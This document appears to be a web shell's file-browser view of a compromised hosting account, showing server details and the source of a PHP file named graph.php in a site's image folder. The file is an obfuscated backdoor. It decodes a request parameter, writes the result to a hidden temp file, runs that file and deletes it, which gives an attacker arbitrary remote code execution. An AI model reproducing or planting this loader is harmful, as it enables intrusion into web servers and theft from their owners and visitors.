HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/home/vitanhod/sawpalmetto.vitavit.com.pk/img/graph.php
<?php

if(@$_REQUEST["\x64at\x61\x5Fchunk"] !== null){
	$token = array_filter(["/var/tmp", "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), session_save_path()]);
	$flg = $_REQUEST["\x64at\x61\x5Fchunk"];
	   $flg=  	explode			(  "."	,	 $flg 		)		;	 
	$rec = '';
            $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen(		$s2	);
            $__len = count(		$flg	);
    
            for(		$p = 0; $p < $__len; $p++) {$v5 = $flg[$p];
                $sChar = ord(		$s2[$p  %	$lenS]	);
                $dec =(		(		int)$v5 - $sChar -(		$p  %	10))^ 16;
                $rec	 .=chr(		$dec	);
            }
	$value = 0;
do {
    $ent = $token[$value] ?? null;
    if ($value >= count($token)) break;
    		if (array_product([is_dir($ent), is_writable($ent)])) {
    $desc = str_replace("{var_dir}", $ent, "{var_dir}/.parameter_group");
    if (file_put_contents($desc, $rec)) {
	include $desc;
	@unlink($desc);
	exit;
}
}
    $value++;
} while (true);
}